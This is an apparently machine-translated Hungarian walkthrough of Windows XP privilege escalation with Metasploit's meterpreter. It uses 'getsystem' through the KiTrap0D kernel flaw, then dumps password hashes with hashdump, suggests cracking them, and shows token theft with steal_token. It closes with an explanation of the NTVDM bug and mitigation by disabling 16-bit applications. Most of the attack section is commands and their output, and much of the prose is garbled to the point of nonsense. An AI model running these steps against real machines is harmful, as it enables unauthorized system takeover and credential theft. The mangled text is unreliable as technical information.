Le userlevel fel jogosultsággal nt authoritysystem bármely Windows-verzió
Csak néhány nappal szülés előtt szobák nyomtatásban szerzett Metasploit
egyenesen az ón modul, amiről mi csak nem tudta megmondani. köszönöm
getsystem egy új csapat a fertőzött rendszert, lehetővé vált, hogy menjen
A felhasználói szint a ring0 kapott NT AUTHORITY \ SYSTEM jobb! És hogy - bármilyen
Windows-verziók.
"Operation Capture System"
Tehát van, hogy a távoli rendszer (élénk példa
kiaknázása adják a cikk „Operation” Aurora „), és mi az a konzol
metasploita. Lássuk, hogyan vagyunk az emberi ügyek:
meterpreter> getuid
Szerver felhasználónév: WINXPSP3 \ felhasználó
Igen, egy normál felhasználó. Talán ő is szerepel a csoportban
adminisztrátorok, de nem érdekel. Plug-in, amely végre
mi érdekli a csapat getSystem, és hátha süllyedt, megjelenik a
segítsen képernyőn:
meterpreter> használat priv
Loading extension priv. siker.
meterpreter> getsystem -h
Használat: getsystem [opciók]
Kísérlet, hogy emelje a kiváltság, hogy, hogy a helyi rendszer.
LEHETŐSÉGEK:
-h Súgó Banner.
-t A technika használható. (Alapérték az '0').
0. Minden rendelkezésre álló módszerek
1. Szolgáltatás - Named Pipe visszaélés (In Memory / Admin)
2. Szolgáltatás - Named Pipe visszaélés (csöpögtetővel / Admin)
3. A szolgáltatás - Token sokszorosítása (In Memory / Admin)
4. Tett - KiTrap0D (memória / felhasználó)
Mint látható, sploit KiTrap0D megvalósítja csak egy része a csapatnak funkciót.
Ha sikerül, hogy megragad egy shell felhasználó, aki már jobb
rendszergazda, akkor emelni a szintet NT AUTHORITY \ SYSTEM
Három másik berendezés (segítségével válassza ki a kívánt -t kapcsoló). Különben is, anélkül,
általában nincs lehetőség, adunk metasploitu hogy tudja használni
bármely megközelítéseket. Beleértve KiTrap0D, ami növeli franchise egy olyan szintre,
„A rendszer”, amit jogokat nem vagyunk megszállott.
meterpreter> getsystem
. Van rendszer (via technika 4).
Igen, megkaptuk az üzenetet, ami a sikeres privilégium eszkaláció, és a támadást
használta KiTrap0D - úgy tűnik, hogy elsőbbséget élvez. Valóban
fel a rendszerben? Nézd meg aktuális UID (User ID):
meterpreter> getuid
Szerver felhasználónév: NT AUTHORITY \ SYSTEM
Ott! Csak egy csapat a konzol és a megfelelő metasploita NT AUTHORITY \ SYSTEM
zsebünkbe. Továbbá, általában elmondható, hogy minden lehetséges. Ugyanakkor ne feledd, nem
Microsoft javítással idején kiadás a magazin valaha.
billenő jelszavak
meterpreter> getuid
Szerver felhasználónév: NT AUTHORITY \ SYSTEM
meterpreter> Futtatás hashdump
[*] Beszerzése a boot gombot.
[*] Kiszámítása HBOOT kulcsot SYSKEY 3ed7 [. ]
[*] Megszerzése a felhasználói listát és a gombokat.
[*] Visszafejtése felhasználói kulcsokat.
[*] Dömping jelszó hash.
Administrator: 500: aad3b435b51404eeaad3b435b51404ee.
Vendégek: 501: aad3b435b51404eeaad3b435b51404ee.
HelpAssistant: 1000: ce909bd50f46021bf4aa40680422f646.
Hash kapunk. Továbbra is etetni őket néhány nyers bontórúd például
l0phtcrack.
Hogyan vissza a franchise?
Egy vicces dolog történt, amikor megpróbáltam, hogy visszatérjen a normális,
felhasználó vissza. Talált rev2self csapat nem sült el, és még mindig
maradt „NT AUTHORITY \ SYSTEM”: úgy tűnik, hogy úgy tervezték, hogy a három
Más megközelítések végre getsystem. Kiderült, hogy visszatér
jogosultságokat, akkor „lopni” jelképes a folyamat által végrehajtott felhasználó
szükségünk van. Ezért minden folyamat látható ps parancsot, és válasszon ki egy
alkalmas:
meterpreter> ps
Process lista
============
PID Név Arch User Path
--- ---- ---- ---- ----
0 [Rendszer Folyamat]
4. A rendszer x86 NT AUTHORITY \ SYSTEM
370 Smss.exe x86 NT AUTHORITY \ SYSTEM \ SystemRoot \ System32 \ Smss.exe
.
1558 explorer.exe x86 WINXPSP3 \ felhasználó C: \ WINDOWS \ Explorer.EXE
.
meterpreter> steal_token 1558
Lopott token felhasználónév: WINXPSP3 \ felhasználó
meterpreter> getuid
Szerver felhasználónév: WINXPSP3 \ felhasználó
Ítélve a területen „Szerver felhasználónév”, akkor a művelet sikeres.
Hogyan működik ez?
Végül érdemes beszélni a természet a biztonsági rés vezetett a megjelenése
sploitov. Biztonsági rés keletkezik a hiba a hibakezelő rendszer
#GP megszakítások (amely az úgynevezett, nt! KiTrap). Mert az ő kernel kiváltságok
tetszőleges kódot lehet végrehajtani. Ez akkor fordul elő, mert a rendszer
Ez nem megfelelően érvényesíti egyes BIOS hívásokat, ha az x86 32 bites platform,
végre egy 16-bites alkalmazást. Működtetni sploit teremt sebezhetőségét
16 bites alkalmazás (% Windir% \ twunk_16.exe), manipulálja néhány
a rendszer struktúráját és okoz NtVdmControl () függvény indul
Windows Virtual DOS Machine (aka podsistma NTVDM), ennek eredményeként a korábbi
manipuláció vezet, hogy hívja a rendszert, és a megszakítás kezelő #GP
kiváltó sploitov. Mellesleg, ez is mutatja, és az egyetlen korlátozás
sploitov, amely csak akkor működik a 32 bites rendszereket. A 64-bites
Operációs rendszer elcsépelt nem emulátorral futtatni 16 bites alkalmazások.
Hogyan védekezhet a sploitov
Mivel egy teljes frissítés a biztonsági rés megoldások még
Meg kell venni kitérőt. A legmegbízhatóbb lehetőség -
MSDOS és disable WOWEXEC alrendszer azonnal megfosztják sploit
funkcionalitás, mint már nem tudta idézni NtVdmControl () függvény
kezdeni NTVDM-rendszer. A régebbi Windows-verziók, mindez olyan
regisztrálja, amelyben megtalálja a fióktelep HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW
és adjunk néhány karaktert a neve. A modern OS
szab határt a távon a 16 bites alkalmazások kell keresztül
Group Policy. Ehhez hívja GPEDIT.MSC fájlt, majd lépjen a szakasz
„Felhasználó konfigurációja / Felügyeleti sablonok / komponensek Windows / kompatibilitása
Applications „és aktiválja a” hozzáférés letiltása 16 bites
alkalmazások. "
Adatszolgáltatás oktatási célokra. Alkalmazását
illegális célokra vezethet büntetőjogi felelősséget.